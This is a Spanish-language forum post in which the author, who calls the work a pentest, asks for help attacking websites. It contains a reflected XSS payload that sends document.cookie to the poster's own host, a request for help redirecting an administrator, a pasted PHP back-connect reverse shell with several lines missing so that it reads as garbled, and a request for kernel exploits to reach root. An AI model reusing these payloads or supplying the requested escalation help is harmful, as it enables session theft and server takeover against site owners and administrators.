PRIMERO:
Estoy llevando un pentest hacia una web y he encontrado un uploader sin filtros he subido una shell modificada para tener un aspecto mas amigable pero no he encontrado la ruta donde se envian los archivos, en mi busqueda he encontrado tambien una FPD(Full Path Disclosure) pero obvio que no muestra la ruta de la shell, tambien he encontrado una SQL injection pero tampoco me vale para nada ya que no hay ni siquiera un panel de contenidos, no al total del servidor.
SEGUNDA:
Realizando otro pentest he encontrado una XSS no persistente os paso la inyeccion a ver si lo hago bien esque es la primera que hago :S el buscador no tiene filtros ni nada y al realizar una busqueda aparece:
Código
<li><span class="totalpaginas">Resultados para mibusqueda</span></li>
y la url queda asi:
http://www.idomain.com/buscador/results?title=mibusqueda
Asi que la url que e preparado es esta:
www.idomain.com/buscador/results?title=</span></li><script>window.location=’http://miweb/ckie.php=’+document.cookie</script>
supongo que bastante simple no? pero bueno am y tengo otra duda respecto a esto necesitaria luego redireccionar al administrador a la web que quiera eso en JS como se haria?
TERCERO:
Tengo una shell inversa en php con este programa:
Código
<?php /********************* @@author : lionaneesh @@facebook : facebook.com/lionaneesh @@Email : lionaneesh@gmail.com ********************/ ?> <html> <head> <title>Back Connect Shell -- PHP</title> </head> <body> <h1>Welcome to Back Connect Control Panel </h1> <p> Fill in the form Below to Start the Back Connect Service </p> <?php $_GET['port'] != "" && $_GET['ip'] != "" ) { echo "<p>The Program is now trying to connect!</p>"; $ip = $_GET['ip']; $port=$_GET['port']; if($errno != 0) { echo "<font color='red'><b>$errno</b> : $errstr</font>"; } else if (!$sockfd) { $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>"; } else { "\n=================================================================\n Back Connect in PHP\n Coded by lionaneesh\n @@author : lionaneesh @@facebook : facebook.com/lionaneesh @@Email : lionaneesh@gmail.com \n================================================================="); $len = 1337; { $cmdPrompt ="(Shell)[$]> "; } } } else { ?> <table align="center" > <form method="GET"> <td> <table style="border-spacing: 6px;"> <tr> <td>Port</td> <td> <input style="width: 200px;" name="port" value="31337" /> </td> </tr> <tr> <td>IP </td> <td><input style="width: 100px;" name="ip" size='5' value="127.0.0.1"/> </tr> <tr> <td> <input style="width: 90px;" class="own" type="submit" value="Connect back :D!"/> </td> </tr> </table> </td> </form> </tr> </table> <p align="center" style="color: red;" >Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!</p> <?php } ?>
El problema es que a pesar de el uso de varios exploits para intentar escalar privilegios no consigo la shell de root la maquina es ubuntu y el kernel:
2.6.28.8-20120119a-iscsi-ntacker-3ware-amd-sec8-ram64-grsec
bueno a pesar de la busqueda exahustiva por google no consigo nada asiqeu a ver si me podeis echar una manita un saludo chicos!!!!